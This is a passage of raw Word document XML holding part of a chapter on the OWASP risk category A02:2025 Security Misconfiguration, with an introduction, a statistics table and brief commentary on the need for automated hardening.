          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>catastrophic regulatory fines (e.g., GDPR/HIPAA), severe legal liabilities, and permanent loss of market trust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152DEF7D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2A94D3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="166B0FCD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2449EC96" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43060A69" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>A02:2025 Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CA48C4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40567340"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 xml:space="preserve">In the rapidly evolving landscape of modern software development, the shift toward highly customizable cloud environments, microservices, and complex application stacks has introduced a critical side effect: a massive expansion of the attack surface due to human error. </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Security Misconfiguration</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs when systems, applications, or cloud infrastructures are deployed without proper security hardening, leaving the digital doors wide open to malicious actors. Whether it is an unpatched default password, an exposed cloud storage bucket, or overly verbose error messages that leak underlying system architecture, these gaps frequently serve as the initial entry point for devastating breaches. As organizations increasingly rely on rapid, continuous deployment pipelines, the absence of automated, repeatable security baseline verifications ensures that misconfigurations remain one of the most pervasive threats to enterprise security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F90353E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Statistical Overview &amp; Impact Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5760F0"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The data behind this vulnerability highlights a staggering reality for modern applications. In the latest security metrics, Security Misconfiguration has climbed significantly in priority, reflecting its near-universal presence across evaluated environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352EDA17"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The scope and impact of this risk category are defined by the following metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61716458" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2513"/>
        <w:gridCol w:w="6132"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="5159AC9F" w14:textId="77777777" w:rsidTr="00B064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236274" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2684D7DB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Value / Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="6F7405EA" w14:textId="77777777" w:rsidTr="00B064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403536" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Average Incidence Rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52465692" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>3.00%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="09326348" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5113CAE8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Maximum Coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F5C0B81" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>100.00%</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">(Every single </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>applicaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> tested exhibited some form</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>misconfguraton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="65E99506" w14:textId="77777777" w:rsidTr="00B064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1767BE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Average Coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35F3D2C5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>52.35%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="5FB9937A" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D06EFA1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Average Weighted</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Exploitability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E23D546" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">7.96 (High ease of discovery and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>exploitaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="1644E98B" w14:textId="77777777" w:rsidTr="00B064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5BA03C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Average Weighted</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F1F13BB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>3.97</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="06999598" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CC02FAB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Total Occurrences</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23F1997A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>719,084</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="2B847C90" w14:textId="77777777" w:rsidTr="00B064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0CAB81" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Total CVEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A1C520C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>1,375</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14AB70DD"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 xml:space="preserve">The most alarming statistic is the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>100% Maximum Coverage</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , meaning that during testing cycles, every analyzed environment contained at least one configuration flaw. Coupled </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">with a high exploitability score of </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>7.96</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , attackers rarely require sophisticated techniques to locate and abuse these gaps, making a formalized, automated hardening process an absolute necessity for defense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10158BE1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
